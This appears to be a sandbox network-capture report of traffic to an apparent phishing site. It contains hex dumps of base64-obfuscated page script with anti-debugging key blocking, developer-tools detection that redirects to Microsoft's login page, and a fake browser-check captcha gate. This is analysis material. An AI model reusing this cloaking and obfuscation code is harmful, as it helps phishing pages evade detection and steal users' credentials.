                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: no-cache, private
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JqsdRh7Vd%2FX03zUnpepWt%2BgcSD5rpIpDBJ9GF7zuEaBviqNDBOQgVRQ3mE110ay70Tsd0WIM9cz4xKcxwy803oH%2BbVc5KWOA4UZB3Q5BIY7hZcMLnq5gok1%2FeTkM%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=5300&min_rtt=5178&rtt_var=1557&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2279&delivery_rate=521039&cwnd=251&unsent_bytes=0&cid=540175318be9b5b6&ts=115&x=0"
                                                                                                                                                                                                                                            Set-Cookie: XSRF-TOKEN=eyJpdiI6ImRSUHFCdWtBbjU4MVpHdFlySG11eEE9PSIsInZhbHVlIjoiZkswcXFSVVRiOFVCUHJSM0hhVGo4dnh1MExidEJOL1NZMHE2a2xrV0RrKzlmWWc1MHErRXYxcFJHOUk2dkhGd3o3TGtHZTB5SWVqZDljd2NJYWxUNWRnTXhRcHF2Tnk4WUhPSkZnSEl4RkxjYThWYU44VE9MYTAvWEord2huWTciLCJtYWMiOiJkYjcyMjhhYTdmNGFkYTJhZWNkYzcxNjYzM2I5ZGYyOGFlMmNiYTM0M2YxMzZkNWEzYjcwNzE0YzEzYWE0NDc0IiwidGFnIjoiIn0%3D; expires=Fri, 10-Jan-2025 14:37:54 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                                                                                                                                                            2025-01-10 12:37:54 UTC732INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6e 52 71 5a 6c 6c 36 61 6b 31 55 52 56 64 68 65 47 6c 35 5a 53 39 55 56 33 42 70 65 57 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 52 32 5a 6a 4d 6e 42 5a 53 58 52 77 62 6d 78 4e 5a 56 6c 74 64 32 52 57 62 57 4e 74 65 6d 39 71 57 48 70 72 56 30 6c 30 63 58 59 31 59 32 46 53 63 48 70 6d 53 7a 46 6b 4c 30 4e 75 4f 47 5a 68 65 43 74 45 4d 57 63 79 61 45 70 71 55 56 42 52 4d 46 49 30 64 6e 70 45 57 45 6c 59 52 30 45 32 63 6b 31 32 64 54 46 4f 51 55 78 6c 63 6e 56 45 51 57 77 35 52 6a 56 31 5a 53 39 6b 52 7a 4e 4d 59 55 78 49 5a 7a 46 70 54 54 68 4a 4d 46 68 33 51 7a 56 6c 62 32 31 46 53 47 49 35 4d 30 64 4f 64 6e 6c 55 56 58 46 7a 5a 46 45
                                                                                                                                                                                                                                            Data Ascii: Set-Cookie: laravel_session=eyJpdiI6InRqZll6ak1URVdheGl5ZS9UV3BpeWc9PSIsInZhbHVlIjoiR2ZjMnBZSXRwbmxNZVltd2RWbWNtem9qWHprV0l0cXY1Y2FScHpmSzFkL0NuOGZheCtEMWcyaEpqUVBRMFI0dnpEWElYR0E2ck12dTFOQUxlcnVEQWw5RjV1ZS9kRzNMYUxIZzFpTThJMFh3QzVlb21FSGI5M0dOdnlUVXFzZFE
                                                                                                                                                                                                                                            2025-01-10 12:37:54 UTC1369INData Raw: 62 36 38 0d 0a 3c 21 2d 2d 20 53 75 63 63 65 73 73 20 69 73 20 6e 6f 74 20 62 75 69 6c 74 20 6f 6e 20 73 75 63 63 65 73 73 2e 20 49 74 26 23 30 33 39 3b 73 20 62 75 69 6c 74 20 6f 6e 20 66 61 69 6c 75 72 65 2e 20 49 74 26 23 30 33 39 3b 73 20 62 75 69 6c 74 20 6f 6e 20 66 72 75 73 74 72 61 74 69 6f 6e 2e 20 53 6f 6d 65 74 69 6d 65 73 20 69 74 26 23 30 33 39 3b 73 20 62 75 69 6c 74 20 6f 6e 20 63 61 74 61 73 74 72 6f 70 68 65 2e 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 53 75 63 63 65 73 73 20 69 73 20 66 69 6e 64 69 6e 67 20 73 61 74 69 73 66 61 63 74 69 6f 6e 20 69 6e 20 67 69 76 69 6e 67 20 61 20 6c 69 74 74 6c 65 20 6d 6f 72 65 20 74 68 61 6e 20 79 6f 75 20 74 61 6b 65 2e 20 2d 2d 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52
                                                                                                                                                                                                                                            Data Ascii: b68... Success is not built on success. It&#039;s built on failure. It&#039;s built on frustration. Sometimes it&#039;s built on catastrophe. -->... Success is finding satisfaction in giving a little more than you take. --><script>if(atob("aHR
                                                                                                                                                                                                                                            2025-01-10 12:37:54 UTC1369INData Raw: 41 62 57 56 6b 61 57 45 67 4b 47 31 70 62 69 31 33 61 57 52 30 61 44 6f 78 4d 6a 41 77 63 48 67 70 65 77 30 4b 49 33 4e 78 55 32 78 6f 59 6b 35 53 56 32 63 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 45 75 4e 58 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 63 33 46 54 62 47 68 69 54 6c 4a 58 5a 79 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 33 4e 78 55 32 78 6f 59 6b 35 53 56 32 63 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4d 54 59 32 63 48 67 37 4c 79 70 33 61 57 52 30 61 44 6f 67 4d 54 41 77 4a 54 73 71 4c 33
                                                                                                                                                                                                                                            Data Ascii: AbWVkaWEgKG1pbi13aWR0aDoxMjAwcHgpew0KI3NxU2xoYk5SV2cgaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojc3FTbGhiTlJXZyBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI3NxU2xoYk5SV2cuY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogMTY2cHg7Lyp3aWR0aDogMTAwJTsqL3
                                                                                                                                                                                                                                            2025-01-10 12:37:54 UTC189INData Raw: 50 53 41 69 59 57 4a 76 64 58 51 36 59 6d 78 68 62 6d 73 69 4f 77 30 4b 66 51 30 4b 5a 47 39 6a 64 57 31 6c 62 6e 51 75 59 57 52 6b 52 58 5a 6c 62 6e 52 4d 61 58 4e 30 5a 57 35 6c 63 69 67 6e 61 32 56 35 5a 47 39 33 62 69 63 73 49 47 5a 31 62 6d 4e 30 61 57 39 75 4b 47 56 32 5a 57 35 30 4b 53 42 37 44 51 6f 67 49 43 41 67 61 57 59 67 4b 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 45 79 4d 79 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6c 64 6d 56 75 64 43 35 77 63 6d 56 32 5a 57 35 30 52 47 56 6d 59 58 56 73 64 43 67 0d 0a
                                                                                                                                                                                                                                            Data Ascii: PSAiYWJvdXQ6YmxhbmsiOw0KfQ0KZG9jdW1lbnQuYWRkRXZlbnRMaXN0ZW5lcigna2V5ZG93bicsIGZ1bmN0aW9uKGV2ZW50KSB7DQogICAgaWYgKGV2ZW50LmtleUNvZGUgPT09IDEyMykgew0KICAgICAgICBldmVudC5wcmV2ZW50RGVmYXVsdCg
                                                                                                                                                                                                                                            2025-01-10 12:37:54 UTC1369INData Raw: 63 31 38 0d 0a 70 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 79 5a 58 52 31 63 6d 34 67 5a 6d 46 73 63 32 55 37 44 51 6f 67 49 43 41 67 66 51 30 4b 44 51 6f 67 49 43 41 67 61 57 59 67 4b 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79 62 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 72 5a 58 6c 44 62 32 52 6c 49 44 30 39 50 53 41 34 4e 53 6b 67 66 48 77 4e 43 69 41 67 49 43 41 67 49 43 41 67 4b 47 56 32 5a 57 35 30 4c 6d 4e 30 63 6d 78 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 63 32 68 70 5a 6e 52 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4e 7a 4d 70 49 48 78 38 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 68 6c 64 6d 56 75 64 43 35 6a 64 48 4a 73 53
                                                                                                                                                                                                                                            Data Ascii: c18pOw0KICAgICAgICByZXR1cm4gZmFsc2U7DQogICAgfQ0KDQogICAgaWYgKA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5rZXlDb2RlID09PSA4NSkgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQuc2hpZnRLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNzMpIHx8DQogICAgICAgIChldmVudC5jdHJsS
                                                                                                                                                                                                                                            2025-01-10 12:37:54 UTC1369INData Raw: 4d 61 32 64 61 63 31 56 4c 49 44 30 67 63 47 56 79 5a 6d 39 79 62 57 46 75 59 32 55 75 62 6d 39 33 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 6c 6d 49 43 68 4a 52 31 6c 4d 61 32 64 61 63 31 56 4c 49 43 30 67 51 33 4e 6e 61 6c 70 56 61 56 64 54 55 69 41 2b 49 48 56 44 55 58 5a 4f 59 58 6c 61 62 47 59 67 4a 69 59 67 49 56 46 46 55 48 64 51 59 30 70 75 65 6b 51 70 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 48 64 35 63 55 4e 46 62 32 56 44 63 6e 51 67 50 53 42 30 63 6e 56 6c 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 55 55 56 51 64 31 42 6a 53 6d 35 36 52 43 41 39 49 48 52 79 64 57 55 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 33 61 57 35 6b 62 33 63 75 62 47 39 6a 59 58 52 70 62 32 34 75 63 6d
                                                                                                                                                                                                                                            Data Ascii: Ma2dac1VLID0gcGVyZm9ybWFuY2Uubm93KCk7DQogICAgICAgIGlmIChJR1lMa2dac1VLIC0gQ3NnalpVaVdTUiA+IHVDUXZOYXlabGYgJiYgIVFFUHdQY0puekQpIHsNCiAgICAgICAgICAgIHd5cUNFb2VDcnQgPSB0cnVlOw0KICAgICAgICAgICAgUUVQd1BjSm56RCA9IHRydWU7DQogICAgICAgICAgICB3aW5kb3cubG9jYXRpb24ucm
                                                                                                                                                                                                                                            2025-01-10 12:37:54 UTC365INData Raw: 49 48 5a 68 62 48 56 6c 50 53 49 69 50 67 30 4b 50 43 39 6d 62 33 4a 74 50 67 30 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38 5a 47 6c 32 49 47 4e 73 59 58 4e 7a 50 53 4a 30 5a 58 68 30 4c 57 4e 6c 62 6e 52 6c 63 69 49 67 61 57 51 39 49 6b 52 55 63 31 64 70 54 6b 68 55 53 30 55 69 50 67 30 4b 52 57 35 7a 64 58 4a 70 62 6d 63 67 65 57 39 31 63 69 42 6a 62 32 35 75 5a 57 4e 30 61 57 39 75 49 47 6c 7a 49 48 4e 68 5a 6d 55 67 59 6e 6b 67 59 32 68 6c 59 32 74 70 62 6d 63 67 65 57 39 31 63 69 42 69 63 6d 39 33 63 32 56 79 4c 67 30 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38 4c 32 5a 76 63 6d 30 2b 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 77 76 5a 47 6c 32 50 67 30 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38 63 32 4e 79 61 58 42 30 50 67 30 4b 64 48 56 79 62 6e 4e 30 61 57 78
                                                                                                                                                                                                                                            Data Ascii: IHZhbHVlPSIiPg0KPC9mb3JtPg0KPC9kaXY+DQo8ZGl2IGNsYXNzPSJ0ZXh0LWNlbnRlciIgaWQ9IkRUc1dpTkhUS0UiPg0KRW5zdXJpbmcgeW91ciBjb25uZWN0aW9uIGlzIHNhZmUgYnkgY2hlY2tpbmcgeW91ciBicm93c2VyLg0KPC9kaXY+DQo8L2Zvcm0+DQo8L2Rpdj4NCjwvZGl2Pg0KPC9kaXY+DQo8c2NyaXB0Pg0KdHVybnN0aWx
                                                                                                                                                                                                                                            2025-01-10 12:37:54 UTC1369INData Raw: 33 36 66 66 0d 0a 36 49 47 46 51 54 45 35 45 57 57 74 45 55 47 4d 73 44 51 6f 67 49 43 41 67 59 32 46 73 62 47 4a 68 59 32 73 36 49 47 64 47 61 48 4e 4b 65 45 46 46 55 6b 49 73 44 51 70 39 4b 54 73 4e 43 6d 5a 31 62 6d 4e 30 61 57 39 75 49 47 46 51 54 45 35 45 57 57 74 45 55 47 4d 6f 4b 53 42 37 44 51 6f 67 49 43 41 67 64 48 56 79 62 6e 4e 30 61 57 78 6c 4c 6e 4a 6c 63 32 56 30 4b 43 6b 37 44 51 70 39 44 51 70 6d 64 57 35 6a 64 47 6c 76 62 69 42 6e 52 6d 68 7a 53 6e 68 42 52 56 4a 43 4b 43 6b 67 65 77 30 4b 49 43 41 67 49 48 5a 68 63 69 42 6e 65 47 56 31 55 58 6c 77 55 47 70 4a 49 44 30 67 5a 47 39 6a 64 57 31 6c 62 6e 51 75 5a 32 56 30 52 57 78 6c 62 57 56 75 64 45 4a 35 53 57 51 6f 49 6d 68 43 62 48 42 61 61 56 5a 56 53 6c 51 69 4b 54 73 4e 43 69 41 67
                                                                                                                                                                                                                                            Data Ascii: 36ff6IGFQTE5EWWtEUGMsDQogICAgY2FsbGJhY2s6IGdGaHNKeEFFUkIsDQp9KTsNCmZ1bmN0aW9uIGFQTE5EWWtEUGMoKSB7DQogICAgdHVybnN0aWxlLnJlc2V0KCk7DQp9DQpmdW5jdGlvbiBnRmhzSnhBRVJCKCkgew0KICAgIHZhciBneGV1UXlwUGpJID0gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoImhCbHBaaVZVSlQiKTsNCiAg
                                                                                                                                                                                                                                            2025-01-10 12:37:54 UTC1369INData Raw: 6f 67 49 43 41 67 49 43 41 67 49 48 64 70 62 6d 52 76 64 79 35 73 62 32 4e 68 64 47 6c 76 62 69 35 79 5a 58 42 73 59 57 4e 6c 4b 43 64 6f 64 48 52 77 63 7a 6f 76 4c 32 78 76 5a 32 6c 75 4c 6d 31 70 59 33 4a 76 63 32 39 6d 64 47 39 75 62 47 6c 75 5a 53 35 6a 62 32 30 6e 4b 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 66 51 30 4b 49 43 41 67 49 48 30 70 4f 77 30 4b 49 43 41 67 49 48 30 4e 43 69 41 67 49 43 42 70 5a 69 68 30 5a 58 68 30 49 43 45 39 49 44 41 70 65 77 30 4b 49 43 41 67 49 48 64 70 62 6d 52 76 64 79 35 73 62 32 4e 68 64 47 6c 76 62 69 35 79 5a 58 42 73 59 57 4e 6c 4b 43 64 6f 64 48 52 77 63 7a 6f 76 4c 32 78 76 5a 32 6c 75 4c 6d 31 70 59 33 4a 76 63 32 39 6d 64 47 39 75 62 47 6c 75 5a 53 35 6a 62 32 30 6e 4b 54 73 4e 43 69 41 67 49 43 42 39 44
                                                                                                                                                                                                                                            Data Ascii: ogICAgICAgIHdpbmRvdy5sb2NhdGlvbi5yZXBsYWNlKCdodHRwczovL2xvZ2luLm1pY3Jvc29mdG9ubGluZS5jb20nKTsNCiAgICAgICAgfQ0KICAgIH0pOw0KICAgIH0NCiAgICBpZih0ZXh0ICE9IDApew0KICAgIHdpbmRvdy5sb2NhdGlvbi5yZXBsYWNlKCdodHRwczovL2xvZ2luLm1pY3Jvc29mdG9ubGluZS5jb20nKTsNCiAgICB9D
                                                                                                                                                                                                                                            2025-01-10 12:37:54 UTC1369INData Raw: 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62 69 49 2b 44 51 6f 38 61 47 56 68 5a 44 34 4e 43 69 41 67 49 43 41 38 63 32 4e 79 61 58 42 30 49 48 4e 79 59 7a 30 69 61 48 52 30 63 48 4d 36 4c 79 39 6a 62 32 52 6c 4c 6d 70 78 64 57 56 79 65 53 35 6a 62 32 30 76 61 6e 46 31 5a 58 4a 35 4c 54 4d 75 4e 69 34 77 4c 6d 31 70 62 69 35 71 63 79 49 2b 50 43 39 7a 59 33 4a 70 63 48 51 2b 44 51 6f 67 49 43 41 67 50 48 4e 6a 63 6d 6c 77 64 43 42 7a 63 6d 4d 39 49 6d 68 30 64 48 42 7a 4f 69 38 76 59 32 68 68 62 47 78 6c 62 6d 64 6c 63 79 35 6a 62 47 39 31 5a 47 5a 73 59 58 4a 6c 4c 6d 4e 76 62 53 39 30 64 58 4a 75 63 33 52 70 62 47 55 76 64 6a 41 76 59 58 42 70 4c 6d 70 7a 50 33 4a 6c 62 6d 52 6c
                                                                                                                                                                                                                                            Data Ascii: CFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRl


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            141192.168.2.1749953104.18.94.414435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:37:55 UTC796OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/6ghio/0x4AAAAAAA3bQQTeiQr3m2wy/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                            Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                            Referer: https://dm9h.zomivane.ru/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:37:55 UTC1362INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:37:55 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 26635
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                            permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                            content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                                                                                                                                                                                            cross-origin-embedder-policy: require-corp
                                                                                                                                                                                                                                            cross-origin-opener-policy: same-origin
                                                                                                                                                                                                                                            cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                            origin-agent-cluster: ?1
                                                                                                                                                                                                                                            accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                            critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                            referrer-policy: same-origin
                                                                                                                                                                                                                                            document-policy: js-profiling
                                                                                                                                                                                                                                            2025-01-10 12:37:55 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 66 63 62 38 39 64 31 66 33 64 65 66 61 31 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: Server: cloudflareCF-RAY: 8ffcb89d1f3defa1-EWRalt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            2025-01-10 12:37:55 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                                                                                                                                                                            2025-01-10 12:37:55 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                                                                                                                                                                                                            Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                                                                                                                                                                                                            2025-01-10 12:37:55 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                                                                                                                                                                                                            Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                                                                                                                                                                                                            2025-01-10 12:37:55 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                                                                                                                                                                                                            Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
